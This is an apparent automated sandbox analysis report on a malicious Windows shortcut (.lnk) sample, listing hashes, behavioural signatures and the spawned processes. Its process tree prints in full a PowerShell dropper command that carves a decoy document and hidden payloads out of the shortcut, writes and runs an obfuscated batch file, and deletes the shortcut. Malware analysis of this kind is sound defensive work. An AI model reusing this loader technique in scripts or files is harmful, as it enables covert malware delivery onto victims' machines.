Analysis
max time kernel: 118s
max time network: 120s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 14/11/2024, 09:10
Static task: static1
Behavioral task: behavioral1
  Sample: bb83597cdf057db754def79d3f94b6cf8837b358178e10e4cc792da56a7523b3.lnk
  Resource: win7-20240729-en
Behavioral task: behavioral2
  Sample: bb83597cdf057db754def79d3f94b6cf8837b358178e10e4cc792da56a7523b3.lnk
  Resource: win10v2004-20241007-en
General
Target: bb83597cdf057db754def79d3f94b6cf8837b358178e10e4cc792da56a7523b3.lnk
Size: 51.4MB
MD5: 5b44285747891464c496aa477e450f10
SHA1: 73417ded382af2e0f3fca04d8d07679af134038b
SHA256: bb83597cdf057db754def79d3f94b6cf8837b358178e10e4cc792da56a7523b3
SHA512: 6855cc7f80972bd9ec0b138220636aca9b4e24e5a2d5663cf5147ee154b0d28a08facbbb44dcb336eefce7fccc6296d0644ed3a2e1b81f2cc0de8a616fccafe6
SSDEEP: 12288:TbjNtn78DnM5CnYFE/oS2P5NdhuKp5AyE9KpNwZ66T9Nzk:TNto2i/J2P5ThuM5XE9aNwZs
Malware Config

Signatures
pid: 2712, Process: powershell.exe

Indicator Removal: File Deletion (1 TTPs)
Adversaries may delete files left behind by the actions of their intrusion activity.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description: Key opened, ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, Process: cmd.exe
description: Key opened, ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, Process: cmd.exe
description: Key opened, ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, Process: powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
pid: 2804, Process: cmd.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid: 2712, Process: powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description: Token: SeDebugPrivilege, pid: 2712, Process: powershell.exe

Suspicious use of WriteProcessMemory (12 IoCs)
description: PID 2488 wrote to memory of 2804, pid: 2488, Process: cmd.exe, procid_target: 31 (reported 4 times)
description: PID 2804 wrote to memory of 2704, pid: 2804, Process: cmd.exe, procid_target: 32 (reported 4 times)
description: PID 2804 wrote to memory of 2712, pid: 2804, Process: cmd.exe, procid_target: 33 (reported 4 times)
Processes
[1] C:\Windows\system32\cmd.exe (PID: 2488)
    Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\bb83597cdf057db754def79d3f94b6cf8837b358178e10e4cc792da56a7523b3.lnk
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe (PID: 2804)
      Command line: "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x03373260} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000110C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0000A328;$lnkFile.Read($pdfFile, 0, 0x0000A328);$pdfPath = $lnkPath.replace('.lnk','.hwpx');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0000B434,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\acer.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x000E45C4,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000633;$lnkFile.Read($stringByte, 0, 0x00000633); $batStrPath = $env:temp+'\'+'dell.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x000E4BF7,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000143;$lnkFile.Read($batByte, 0, 0x00000143);$executePath = $env:temp+'\'+'asu'+'s.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close(); remove-item -path $lnkPath -force; "&& exit
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe (PID: 2704)
        Command line: C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        - System Location Discovery: System Language Discovery
    [3] C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe (PID: 2712)
        Command line: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x03373260} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000110C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0000A328;$lnkFile.Read($pdfFile, 0, 0x0000A328);$pdfPath = $lnkPath.replace('.lnk','.hwpx');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x0000B434,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\acer.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x000E45C4,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000633;$lnkFile.Read($stringByte, 0, 0x00000633); $batStrPath = $env:temp+'\'+'dell.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x000E4BF7,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000143;$lnkFile.Read($batByte, 0, 0x00000143);$executePath = $env:temp+'\'+'asu'+'s.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close(); remove-item -path $lnkPath -force; "
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken